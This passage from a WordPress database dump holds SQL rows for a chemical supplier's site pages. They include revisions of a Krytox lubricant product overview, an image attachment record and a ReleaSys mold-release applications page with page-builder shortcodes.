width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil &amp; 20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">Special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. Grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">Designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>Krytox Lubricants for Specialty Applications</strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-06-01 15:47:06', '2017-06-01 15:47:06', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4391, 3, '2017-06-01 15:53:22', '2017-06-01 15:53:22', 'High performance concrete release agent', 'Concrete Release Agent', 'ReleaSys CR designed for complex, high performance release of concrete', 'inherit', 'closed', 'closed', '', 'shutterstock_123579979', '', '', '2017-06-01 15:54:25', '2017-06-01 15:54:25', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/06/shutterstock_123579979.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4392, 2, '2017-06-01 15:59:57', '2017-06-01 15:59:57', '<h2 style="text-align: center;">Krytox History &amp; Product Overview</h2>\r\n<h3><strong>For the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a></strong></h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gearbox lubricant, and even gyroscope oil.\r\n\r\nIn 1963, GE used Krytox oil for an engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil &amp; 20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on the long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These newly patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">Special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. Grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range but is designed to work best at temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">Designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high-temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. Grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3">\r\n<h4><strong>Krytox Lubricants for Specialty Applications</strong></h4>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low-speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing a mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-06-01 15:59:57', '2017-06-01 15:59:57', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4393, 3, '2017-06-01 16:01:34', '2017-06-01 16:01:34', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\n\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\n\n[text_box text_color="dark" hover="fade-out" width="95" scale="79" padding="5px 30px 10px 30px" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\n\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application specific sections below.</p>\n\n[/text_box]\n\n[/ux_banner]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4351" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Advanced Composites</h2>\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions.Products for this applicationneed to cure quickly, adhere strongly to the mold surface, and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ by providing a single-coat agent that does not require sealers or primers.</p>\n[button text="ReleaSys™ 8900 & 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4360" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rotational Plastics (Rotomolding)</h2>\n<p>Rotational Molding is a dynamic industry which utilizesan ever-widening variety of thermoplastic resins.In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolreance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, uniformity and multiple releases per application</p>\n[button text="ReleaSys™ RM"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4366" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Polyurethane-TPU</h2>\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants polyurethane can be molded (High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands of a release agent very high.Miller-Stephenson’s <b>ReleaSys™</b> release systems has specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenacious to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass provide critical protection to your mold surface and highly effective release properties.</p>\n[button text="ReleaSys™ 8800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4387" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Rubber / Silicone / Elastomers</h2>\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and all other elastomers,Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years.Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers the ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is non-silicone, water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\n[button text="ReleaSys™ 8200"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4332" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Injection Plastics Mold Release</h2>\n<p>There are numerous resins used in plastic injection molding, however regardless of the substrate critical performance criteria exist for all mold release used: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.  Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\n[button text="ReleaSys™ 9800"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4337" image_size="medium"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Fiberglass Mold Release</h2>\n<p>Miller-Stephenson delivers most durable, highest performing mold release agents to the aerospace and fiberglass industry. Our products provide multiple releases, critical tooling protection, and no transfer from only a single coat.  No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you. </p>\n[button text="ReleaSys™ 9900"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n[row style="collapse" width="full-width" v_align="middle"]\n\n[col span="6" span__sm="12"]\n\n[ux_image id="4391"]\n\n\n[/col]\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\n\n<h2>Pre-Cast Mold Release Mold Release</h2>\n<p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.</p>\n[button text="READ MORE"]\n\n\n[/col]\n\n[/row]\n[divider]\n\n\n[/section]', 'Release Agent Applications', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-01 16:01:34', '2017-06-01 16:01:34', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
